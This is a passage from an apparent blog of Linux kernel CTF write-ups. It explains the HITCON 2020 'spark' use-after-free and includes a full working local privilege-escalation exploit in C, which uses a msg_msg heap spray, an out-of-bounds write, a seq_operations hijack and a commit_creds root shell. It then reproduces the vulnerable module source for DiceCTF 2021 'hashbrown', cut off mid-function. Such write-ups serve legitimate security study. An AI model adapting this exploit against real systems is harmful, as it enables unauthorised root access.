</span></span><span style="display:flex;"><span><span style="color:#a6e22e">close</span>(fds[<span style="color:#ae81ff">1</span>]); </span></span></code></pre></div><h3 id="build-fake-node">Build fake node</h3> <p>The structure of node and linked list node is like:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> bk; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> fd; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_node_t</span><span style="color:#f92672">*</span> target; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> weight; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">spark_link_t</span>; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_node_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> ref_cnt; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> __padding_0; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> start_lock[<span style="color:#ae81ff">32</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> is_finalized; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> __padding_1; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> nb_lock[<span style="color:#ae81ff">32</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> link_cnt; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> bk; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> fd; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx_in_table; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">spark_node_table_t</span><span style="color:#f92672">*</span> node_table; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">spark_node_t</span>; </span></span></code></pre></div><p>And the invalid values in <code>spark_node_t</code> may cause crash. And with several tries I found if <code>start_lock</code> is zeros and bk and fd is correctly set, crash does not occurs.</p> <p>So, I try finding proper object which can control UAF object and I decide to use <a href="https://elixir.bootlin.com/linux/v5.9.11/source/ipc/msgutil.c#L37"><code>struct msg_msgseg</code></a>. It allocated by user-defined length and user&rsquo;s data. And the best thing is it can be fully controlled by user!! (except first 8 bytes). Because the first 8 bytes of <code>spark_node_t</code> is index of each node, it can be set any value.</p> <p>Now we can control the UAF node by <code>struct msg_msgseg</code>.</p> <h4 id="prevent-crash-while-finalize">Prevent crash while finalize</h4> <p>By using <code>struct msg_msgseg</code> and set <code>start_lock</code> with zeros, the crash in <code>mutex_lock</code> can be prevented. But there is the traversal mechanism which travel the linked nodes in <code>traversal</code>. The traversal ends when <code>&amp;node-&gt;bk == cur_node-&gt;bk</code>.</p> <p>Since we does not know the address of node, we cannot stop the traversal and this occurs the crash&hellip;. However differ my expectation, the crash does not reboot the OS and print kernel&rsquo;s registers! Morever in the kernel&rsquo;s registers there is the address of UAF node (R13).</p> <p>With this observation, I crash the kernel several times and the address of UAF node may not be changed. So I think I can use it.</p> <p>After one crashing, I set bk and fd with the value of R13+0x60 (this is R12 of panic information) and execute the program, no crash occurs in <code>traversal</code>.</p> <h3 id="make-invalid-node-table-by-finalize">Make invalid node table by finalize</h3> <p>The <code>spark_node_finalize</code> function makes the node table and set each linked node&rsquo;s index in the table. For example, the graph is following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span> B -- 10 -- D </span></span><span style="display:flex;"><span> / \ </span></span><span style="display:flex;"><span> 4 | </span></span><span style="display:flex;"><span> / | </span></span><span style="display:flex;"><span>A 5 </span></span><span style="display:flex;"><span> \ | </span></span><span style="display:flex;"><span> 2 | </span></span><span style="display:flex;"><span> \ | </span></span><span style="display:flex;"><span> C -- 3 - E </span></span></code></pre></div><p>And if we request finalize on node A, the A&rsquo;s <code>node_table</code> and <code>idx_in_table</code> of each nodes are set by following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>0: A (its `idx_in_table` is 0) </span></span><span style="display:flex;"><span>1: C (its `idx_in_table` is 1) </span></span><span style="display:flex;"><span>2: E (its `idx_in_table` is 2) </span></span><span style="display:flex;"><span>3: B (its `idx_in_table` is 3) </span></span><span style="display:flex;"><span>4: D (its `idx_in_table` is 4) </span></span></code></pre></div><p>The <code>node_table</code> and <code>idx_in_table</code> is used in <code>spark_graph_query</code> (And in this function, 8 bytes OOB write can be triggered, explained in later).</p> <p>Since the environment of this challenge is No-SMAP and No-SMEP and we can controll fd and bk of UAF node, we can insert fake nodes (defined in user-land) to linked list. So for the OOB write I set fake nodes to build <code>node_table</code> like following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>0: A </span></span><span style="display:flex;"><span>1: UAF node </span></span><span style="display:flex;"><span>2: Fake user-land node </span></span><span style="display:flex;"><span>3: Fake user-land node </span></span></code></pre></div><h3 id="trigger-oob-write">Trigger OOB write</h3> <p>In <code>spark_graph_query</code> function, there is a following routine:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>temp_dists <span style="color:#f92672">=</span> (<span style="color:#66d9ef">__int64</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">_kmalloc</span>(<span style="color:#ae81ff">8</span> <span style="color:#f92672">*</span> node_table<span style="color:#f92672">-&gt;</span>size, _GFP_IO <span style="color:#f92672">|</span> ___GFP_FS <span style="color:#f92672">|</span> ___GFP_DIRECT_RECLAIM <span style="color:#f92672">|</span> ___GFP_KSWAPD_RECLAIM); </span></span><span style="display:flex;"><span><span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>bk <span style="color:#f92672">=</span> cur_node<span style="color:#f92672">-&gt;</span>bk; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> ( end <span style="color:#f92672">=</span> <span style="color:#f92672">&amp;</span>cur_node<span style="color:#f92672">-&gt;</span>bk; bk <span style="color:#f92672">!=</span> (<span style="color:#66d9ef">spark_link_t</span> <span style="color:#f92672">*</span>)end; bk <span style="color:#f92672">=</span> bk<span style="color:#f92672">-&gt;</span>bk ) </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> p_upated_dist <span style="color:#f92672">=</span> <span style="color:#f92672">&amp;</span>temp_dists[bk<span style="color:#f92672">-&gt;</span>target<span style="color:#f92672">-&gt;</span>idx_in_table]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">*</span>p_upated_dist <span style="color:#f92672">!=</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span> ) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> dist_of_this_path <span style="color:#f92672">=</span> dist_to_cur <span style="color:#f92672">+</span> bk<span style="color:#f92672">-&gt;</span>weight; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">*</span>p_upated_dist <span style="color:#f92672">&gt;</span> dist_of_this_path ) </span></span><span style="display:flex;"><span> <span style="color:#f92672">*</span>p_upated_dist <span style="color:#f92672">=</span> dist_of_this_path; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#75715e">// ... </span></span></span></code></pre></div><p>Because our target (and its idx_in_table) of <code>node_table</code> can be controlld by us, we can write <code>temp_dists</code> with arbitrary index by setting <code>idx_in_table</code>. Furthermore since the weigth of bk node can be controlled by user, we can get arbitrary 8 bytes OOB write.</p> <h3 id="rip-control">RIP control</h3> <p>Since the <code>size</code> of <code>node_bale</code> is 4 and then the <code>kamlloc</code> allocate 32 bytes chunk, I decide to use <a href="https://elixir.bootlin.com/linux/v5.9.11/source/include/linux/seq_file.h#L31"><code>struct seq_operations</code></a> to control RIP.</p> <p>We can run user-mode code via RIP control because SMEP is not enabled.</p> <h3 id="exploit-code">Exploit code</h3> <div class="collapsable-code"> <input id="984153267" type="checkbox" checked /> <label for="984153267"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">HITCON2020-spark-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;linux/keyctl.h&gt; #include &lt;stdarg.h&gt; #include &lt;stddef.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/ipc.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/msg.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;syscall.h&gt; #include &lt;unistd.h&gt; static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); static void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } static void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } struct msgbuf { long mtype; /* message type, must be &gt; 0 */ char mtext[1]; /* message data */ }; int send_msg(int msgqid, char* data, size_t size, long mtype); int recv_msg(int msgqid, char* data, size_t size, long mtype); int send_msg(int msgqid, char* data, size_t size, long mtype) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; memcpy(m-&gt;mtext, data, size); m-&gt;mtype = mtype; ret = msgsnd(msgqid, m, size, 0); free(m); return ret; } int recv_msg(int msgqid, char* data, size_t size, long mtype) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; m-&gt;mtype = mtype; ret = msgrcv(msgqid, m, size, mtype, 0); memcpy(data, m-&gt;mtext, size); free(m); return ret; } #define VULN_DEV_NAME &#34;/dev/node&#34; #define VULN_DEV_CMD_LINK 0x4008D900 #define VULN_DEV_CMD_FINALIZE 0xD902 #define VULN_DEV_CMD_QUERY 0xC010D903 #define VULN_DEV_CMD_GET_INFO 0x8018D901 typedef struct query_t { int fd1; int fd2; int64_t distance; } query_t; typedef struct node_info_t { uint64_t link_cnt; uint64_t idx_in_weights; uint64_t weights_size; } node_info_t; typedef struct spark_link_t { struct spark_link_t* bk; struct spark_link_t* fd; struct spark_node_t* target; uint64_t weight; } spark_link_t; typedef struct spark_node_table_t { uint64_t size; uint64_t capacity; struct spark_node_t** nodes; } spark_node_table_t; typedef struct spark_node_t { uint64_t idx; uint32_t ref_cnt; uint32_t __padding_0; char start_lock[32]; uint32_t is_finalized; uint32_t __padding_1; char nb_lock[32]; uint64_t link_cnt; struct spark_link_t* bk; struct spark_link_t* fd; uint64_t idx_in_table; spark_node_table_t* node_table; } spark_node_t; static int vuln_dev_link(int fd1, int fd2, int weight); static int vuln_dev_finalize(int fd); static int64_t vuln_dev_query(int fd, int fd1, int fd2); static node_info_t vuln_dev_get_info(int fd); static int vuln_dev_link(int fd1, int fd2, int weight) { return ioctl(fd1, VULN_DEV_CMD_LINK, (uint64_t)fd2 | ((uint64_t)weight &lt;&lt; 32)); } static int vuln_dev_finalize(int fd) { return ioctl(fd, VULN_DEV_CMD_FINALIZE); } static int64_t vuln_dev_query(int fd, int fd1, int fd2) { query_t qry = {.fd1 = fd1, .fd2 = fd2, .distance = -1}; if (ioctl(fd, VULN_DEV_CMD_QUERY, &amp;qry)) { return -1; } return qry.distance; } static node_info_t vuln_dev_get_info(int fd) { node_info_t info; ioctl(fd, VULN_DEV_CMD_GET_INFO, &amp;info); return info; } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } static void restore_state() { asm volatile( &#34;swapgs;\n&#34; &#34;mov qword ptr [rsp+0x20], %[u_ss];\n&#34; &#34;mov qword ptr [rsp+0x18], %[u_sp];\n&#34; &#34;mov qword ptr [rsp+0x10], %[u_rflags];\n&#34; &#34;mov qword ptr [rsp+0x08], %[u_cs];\n&#34; &#34;mov qword ptr [rsp+0x00], %[u_ret];\n&#34; &#34;iretq;\n&#34; ::[u_cs] &#34;r&#34;(user_cs), [u_ss] &#34;r&#34;(user_ss), [u_sp] &#34;r&#34;(user_sp), [u_rflags] &#34;r&#34;(user_rflags), [u_ret] &#34;r&#34;(get_shell)); } __attribute__((naked)) static void get_root_shell() { asm volatile( &#34;mov rax, [rsp];\n&#34; &#34;sub rax, 0x3185d4;\n&#34; // rax will be kernel_base &#34;mov r15, rax;\n&#34; // r15 will be kernel_base // Call prepare_kernel_cred &#34;xor rdi, rdi;\n&#34; &#34;add rax, 0xbe9c0;\n&#34; // rax will be prepare_kernel_cred &#34;call rax;\n&#34; // Call commit_creds &#34;mov rdi, rax;\n&#34; &#34;mov rax, r15;\n&#34; &#34;add rax, 0xbe550;\n&#34; // rax will be commit_creds &#34;call rax;\n&#34; : : : &#34;rax&#34;, &#34;rdi&#34;, &#34;r15&#34;, &#34;memory&#34;); restore_state(); } int main(int argc, char* argv[]) { save_state(); int fds[2]; puts(&#34;[*] Alloc 2 nodes&#34;); for (int i = 0; i &lt; sizeof(fds) / 4; ++i) { fds[i] = open(VULN_DEV_NAME, O_RDONLY); } puts(&#34;[*] Link 2 nodes&#34;); vuln_dev_link(fds[0], fds[1], 0); puts(&#34;[*] Trigger UAF and build fake node and fake link&#34;); close(fds[1]); char* msg_mem = malloc(0x2000); memset(msg_mem, &#39;a&#39;, 0x2000); memset(msg_mem + 0x1000 - 48, 0, 0x1000 + 48); char* fake_mem = malloc(0x1000); memset(fake_mem, 0, 0x1000); spark_node_t* fake_node_1 = (spark_node_t*)fake_mem; spark_node_t* fake_node_2 = (spark_node_t*)(fake_mem + sizeof(spark_node_t)); spark_link_t* fake_link_1 = (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t)); spark_link_t* fake_link_2 = (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t) + sizeof(spark_link_t)); spark_link_t* fake_link_3 = (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t) + 2 * sizeof(spark_link_t)); spark_node_t* uaf_fake_node_data = (spark_node_t*)(msg_mem + 0x1000 - 48 - 8); printf( &#34;[*] fake_node_1: %p, fake_link_1: %p, fake_node_2: %p, fake_link_2: &#34; &#34;%p\n&#34;, fake_node_1, fake_link_1, fake_node_2, fake_link_2); if (argc == 2) { uint64_t uaf_fake_node_addr = strtoull(argv[1], NULL, 16); // R12(==R13+0x60) of panic uaf_fake_node_data-&gt;ref_cnt = 3; uaf_fake_node_data-&gt;idx_in_table = 0xdeadbeef; uaf_fake_node_data-&gt;bk = (spark_link_t*)fake_link_1; uaf_fake_node_data-&gt;fd = (spark_link_t*)fake_link_2; fake_link_1-&gt;target = fake_node_1; fake_link_1-&gt;bk = (spark_link_t*)fake_link_2; fake_link_1-&gt;fd = (spark_link_t*)uaf_fake_node_addr; fake_link_2-&gt;target = fake_node_2; fake_link_2-&gt;bk = (spark_link_t*)uaf_fake_node_addr; fake_link_2-&gt;fd = (spark_link_t*)fake_node_1; fake_node_1-&gt;idx = 0xdeadbeef; fake_node_1-&gt;ref_cnt = 3; fake_node_1-&gt;is_finalized = 0; fake_node_1-&gt;bk = (spark_link_t*)&amp;fake_node_1-&gt;bk; fake_node_1-&gt;fd = (spark_link_t*)&amp;fake_node_1; fake_node_2-&gt;idx = 0xcafebebe; fake_node_2-&gt;ref_cnt = 3; fake_node_2-&gt;is_finalized = 0; fake_node_2-&gt;bk = (spark_link_t*)&amp;fake_node_2-&gt;bk; fake_node_2-&gt;fd = (spark_link_t*)&amp;fake_node_2; } else { uaf_fake_node_data-&gt;ref_cnt = 1; } send_msg(1, msg_mem, 0x1000 - 48 + 0x80 - 8, 1); puts(&#34;[*] Put fake node to node_tables&#34;); vuln_dev_finalize(fds[0]); puts(&#34;[*] Modify nodes...&#34;); fake_node_1-&gt;bk = (spark_link_t*)fake_link_3; fake_node_1-&gt;fd = (spark_link_t*)fake_link_3; fake_link_3-&gt;bk = (spark_link_t*)&amp;fake_node_1-&gt;bk; fake_link_3-&gt;fd = (spark_link_t*)&amp;fake_node_1-&gt;bk; fake_link_3-&gt;target = fake_node_2; fake_link_3-&gt;weight = (uint64_t)get_root_shell; fake_node_2-&gt;idx_in_table = 4; puts(&#34;[*] Spraying seq_ops...&#34;); int seq_ops_spray[100]; for (int i = 0; i &lt; sizeof(seq_ops_spray) / 4; ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } close(seq_ops_spray[0]); if (fake_node_1-&gt;idx_in_table != 0) { puts(&#34;[+] Success to build fake node&#34;); } else { puts(&#34;[-] Failed to build fake node&#34;); return -1; } int new_nodes[4]; for (int i = 0; i &lt; sizeof(new_nodes) / 4; ++i) { new_nodes[i] = open(VULN_DEV_NAME, O_RDONLY); if (i != 0) { vuln_dev_link(new_nodes[i - 1], new_nodes[i], 0x100 + i); } } vuln_dev_finalize(new_nodes[3]); puts(&#34;[*] Trigger OOB and overwrite seq_ops&#34;); vuln_dev_query(fds[0], new_nodes[1], new_nodes[0]); puts(&#34;[*] ACE!!&#34;); for (int i = 0; i &lt; sizeof(seq_ops_spray) / 4; ++i) { char buf[1]; read(seq_ops_spray[i], buf, 1); } memset(fake_mem, 0, 0x1000); return 0; }</code></pre></div> <p>To get a root shell, we need to execute the exploit program twice:</p> <ol> <li>Run the program without any arguments.</li> <li>Run the program with value of kernel&rsquo;s R12 register shown by kernel panic.</li> </ol> <p>For example, after executing this program without any arguments, the kernel panic occurs and its information is printed as following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>[ 60.936674] BUG: kernel NULL pointer dereference, address: 0000000000000010 </span></span><span style="display:flex;"><span>[ 60.937311] #PF: supervisor read access in kernel mode </span></span><span style="display:flex;"><span>[ 60.937974] #PF: error_code(0x0000) - not-present page </span></span><span style="display:flex;"><span>[ 60.938416] PGD de07067 P4D de07067 PUD de06067 PMD 0 </span></span><span style="display:flex;"><span>[ 60.939092] Oops: 0000 [#1] SMP NOPTI </span></span><span style="display:flex;"><span>[ 60.939439] CPU: 0 PID: 123 Comm: exploit Tainted: G E 5.9.11 #1 </span></span><span style="display:flex;"><span>[ 60.939824] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 </span></span><span style="display:flex;"><span>[ 60.940679] RIP: 0010:traversal+0x52/0x110 [spark] </span></span><span style="display:flex;"><span>[ 60.941182] Code: c0 75 77 48 8d 50 01 49 89 16 49 89 44 24 70 49 8b 36 49 3b 76 08 0f 84 81 00 00 00 49 8b 5c 24 60 49 83 c4 60 0 </span></span><span style="display:flex;"><span>[ 60.942692] RSP: 0018:ffffc900001d7e10 EFLAGS: 00000207 </span></span><span style="display:flex;"><span>[ 60.943401] RAX: ffff88800ddcaf20 RBX: 0000000000000000 RCX: 00000000000008d3 </span></span><span style="display:flex;"><span>[ 60.943929] RDX: 00000000000008d2 RSI: c1f7a9928c6ca877 RDI: 0000000000031060 </span></span><span style="display:flex;"><span>[ 60.944350] RBP: ffffc900001d7e38 R08: ffffc900001d7d98 R09: 0000000000000000 </span></span><span style="display:flex;"><span>[ 60.944940] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88800dd4fb60 </span></span><span style="display:flex;"><span>[ 60.945509] R13: ffff88800dd4fb00 R14: ffff88800ddcaf80 R15: ffff88800dd4fb10 </span></span><span style="display:flex;"><span>[ 60.946147] FS: 0000000001787380(0000) GS:ffff88800f600000(0000) knlGS:0000000000000000 </span></span><span style="display:flex;"><span>[ 60.946744] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 </span></span><span style="display:flex;"><span>[ 60.947116] CR2: 0000000000000010 CR3: 000000000de04000 CR4: 00000000000006f0 </span></span><span style="display:flex;"><span>[ 60.947932] Call Trace: </span></span><span style="display:flex;"><span>[ 60.948909] traversal+0xa0/0x110 [spark] </span></span><span style="display:flex;"><span>[ 60.949412] spark_node_finalize+0x83/0xb0 [spark] </span></span><span style="display:flex;"><span>[ 60.949769] node_ioctl+0x136/0x250 [spark] </span></span><span style="display:flex;"><span>[ 60.949977] ? tomoyo_file_ioctl+0x19/0x20 </span></span><span style="display:flex;"><span>[ 60.950249] __x64_sys_ioctl+0x96/0xd0 </span></span><span style="display:flex;"><span>[ 60.950477] do_syscall_64+0x37/0x80 </span></span><span style="display:flex;"><span>[ 60.950819] entry_SYSCALL_64_after_hwframe+0x44/0xa9 </span></span><span style="display:flex;"><span>[ 60.951459] RIP: 0033:0x423d3d </span></span><span style="display:flex;"><span>[ 60.951794] Code: 04 25 28 00 00 00 48 89 45 c8 31 c0 48 8d 45 10 c7 45 b0 10 00 00 00 48 89 45 b8 48 8d 45 d0 48 89 45 c0 b8 10 0 </span></span><span style="display:flex;"><span>[ 60.953022] RSP: 002b:00007fff9334fb60 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 </span></span><span style="display:flex;"><span>[ 60.953536] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000423d3d </span></span><span style="display:flex;"><span>[ 60.954020] RDX: 0000000000000000 RSI: 000000000000d902 RDI: 0000000000000003 </span></span><span style="display:flex;"><span>[ 60.954957] RBP: 00007fff9334fbb0 R08: 0000000000000001 R09: 0000000000000000 </span></span><span style="display:flex;"><span>[ 60.955548] R10: 0000000000000000 R11: 0000000000000246 R12: 00007fff9334ff18 </span></span><span style="display:flex;"><span>[ 60.956501] R13: 00007fff9334ff28 R14: 00000000004ae868 R15: 0000000000000001 </span></span><span style="display:flex;"><span>[ 60.957217] Modules linked in: spark(E) </span></span><span style="display:flex;"><span>[ 60.957834] CR2: 0000000000000010 </span></span><span style="display:flex;"><span>[ 60.958602] ---[ end trace c0dd566a19a98686 ]--- </span></span><span style="display:flex;"><span>[ 60.958973] RIP: 0010:traversal+0x52/0x110 [spark] </span></span><span style="display:flex;"><span>[ 60.959299] Code: c0 75 77 48 8d 50 01 49 89 16 49 89 44 24 70 49 8b 36 49 3b 76 08 0f 84 81 00 00 00 49 8b 5c 24 60 49 83 c4 60 0 </span></span><span style="display:flex;"><span>[ 60.960089] RSP: 0018:ffffc900001d7e10 EFLAGS: 00000207 </span></span><span style="display:flex;"><span>[ 60.960471] RAX: ffff88800ddcaf20 RBX: 0000000000000000 RCX: 00000000000008d3 </span></span><span style="display:flex;"><span>[ 60.961083] RDX: 00000000000008d2 RSI: c1f7a9928c6ca877 RDI: 0000000000031060 </span></span><span style="display:flex;"><span>[ 60.961918] RBP: ffffc900001d7e38 R08: ffffc900001d7d98 R09: 0000000000000000 </span></span><span style="display:flex;"><span>[ 60.962316] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88800dd4fb60 </span></span><span style="display:flex;"><span>[ 60.962646] R13: ffff88800dd4fb00 R14: ffff88800ddcaf80 R15: ffff88800dd4fb10 </span></span><span style="display:flex;"><span>[ 60.963020] FS: 0000000001787380(0000) GS:ffff88800f600000(0000) knlGS:0000000000000000 </span></span><span style="display:flex;"><span>[ 60.963489] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 </span></span><span style="display:flex;"><span>[ 60.963832] CR2: 0000000000000010 CR3: 000000000de04000 CR4: 00000000000006f0 </span></span><span style="display:flex;"><span>Killed </span></span></code></pre></div><p>Then, execute the program with <code>ffff88800dd4fb60</code> (its R12 value of printed panic information).</p> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/HITCON/2020/spark">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/HITCON/2020/spark</a></li> </ul> DiceCTF2021 hashbrown /posts/kernel/write-ups/ctf/dicectf2021-hashbrown/ Tue, 11 Feb 2025 13:29:06 +0000 /posts/kernel/write-ups/ctf/dicectf2021-hashbrown/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.11-rc3/source"><code>5.11.0-rc3</code></a> <ul> <li>CONFIG_SLAB_FREELIST_RANDOM=y</li> <li>CONFIG_SLAB=y</li> <li>CONFIG_FG_KASLR=y</li> </ul> </li> <li>unprivileged_userfaultfd: 1</li> <li>unprivileged_bpf_disabled: 0</li> </ul> <h3 id="module">Module</h3> <div class="collapsable-code"> <input id="381792654" type="checkbox" checked /> <label for="381792654"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">DiceCTF2021-hashbrown-module.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;linux/device.h&gt; #include &lt;linux/fs.h&gt; #include &lt;linux/kernel.h&gt; #include &lt;linux/module.h&gt; #include &lt;linux/mutex.h&gt; #include &lt;linux/slab.h&gt; #include &lt;linux/uaccess.h&gt; #define DEVICE_NAME &#34;hashbrown&#34; #define CLASS_NAME &#34;hashbrown&#34; MODULE_AUTHOR(&#34;FizzBuzz101&#34;); MODULE_DESCRIPTION(&#34;Here&#39;s a hashbrown for everyone!&#34;); MODULE_LICENSE(&#34;GPL&#34;); #define ADD_KEY 0x1337 #define DELETE_KEY 0x1338 #define UPDATE_VALUE 0x1339 #define DELETE_VALUE 0x133a #define GET_VALUE 0x133b #define SIZE_ARR_START 0x10 #define SIZE_ARR_MAX 0x200 #define MAX_ENTRIES 0x400 #define MAX_VALUE_SIZE 0xb0 #define GET_THRESHOLD(size) size - (size &gt;&gt; 2) #define INVALID 1 #define EXISTS 2 #define NOT_EXISTS 3 #define MAXED 4 static DEFINE_MUTEX(operations_lock); static DEFINE_MUTEX(resize_lock); static long hashmap_ioctl(struct file *file, unsigned int cmd, unsigned long arg); static int major; static struct class *hashbrown_class = NULL; static struct device *hashbrown_device = NULL; static struct file_operations hashbrown_fops = {.unlocked_ioctl = hashmap_ioctl}; typedef struct { uint32_t key; uint32_t size; char *src; char *dest; } request_t; struct hash_entry { uint32_t key; uint32_t size; char *value; struct hash_entry *next; }; typedef struct hash_entry hash_entry; typedef struct { uint32_t size; uint32_t threshold; uint32_t entry_count; hash_entry **buckets; } hashmap_t; hashmap_t hashmap; static noinline uint32_t get_hash_idx(uint32_t key, uint32_t size); static noinline long resize(request_t *arg); static noinline void resize_add(uint32_t idx, hash_entry *entry, hash_entry **new_buckets); static noinline void resize_clean_old(void); static noinline long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src); static noinline long delete_key(uint32_t idx, uint32_t key); static noinline long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src); static noinline long delete_value(uint32_t idx, uint32_t key); static noinline long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest); #pragma GCC push_options #pragma GCC optimize(&#34;O1&#34;) static long hashmap_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { long result; request_t request; uint32_t idx; if (cmd == ADD_KEY) { if (hashmap.entry_count == hashmap.threshold &amp;&amp; hashmap.size &lt; SIZE_ARR_MAX) { mutex_lock(&amp;resize_lock); result = resize((request_t *)arg); mutex_unlock(&amp;resize_lock); return result; } } mutex_lock(&amp;operations_lock); if (copy_from_user((void *)&amp;request, (void *)arg, sizeof(request_t))) { result = INVALID; } else if (cmd == ADD_KEY &amp;&amp; hashmap.entry_count == MAX_ENTRIES) { result = MAXED; } else { idx = get_hash_idx(request.key, hashmap.size); switch (cmd) { case ADD_KEY: result = add_key(idx, request.key, request.size, request.src); break; case DELETE_KEY: result = delete_key(idx, request.key); break; case UPDATE_VALUE: result = update_value(idx, request.key, request.size, request.src); break; case DELETE_VALUE: result = delete_value(idx, request.key); break; case GET_VALUE: result = get_value(idx, request.key, request.size, request.dest); break; default: result = INVALID; break; } } 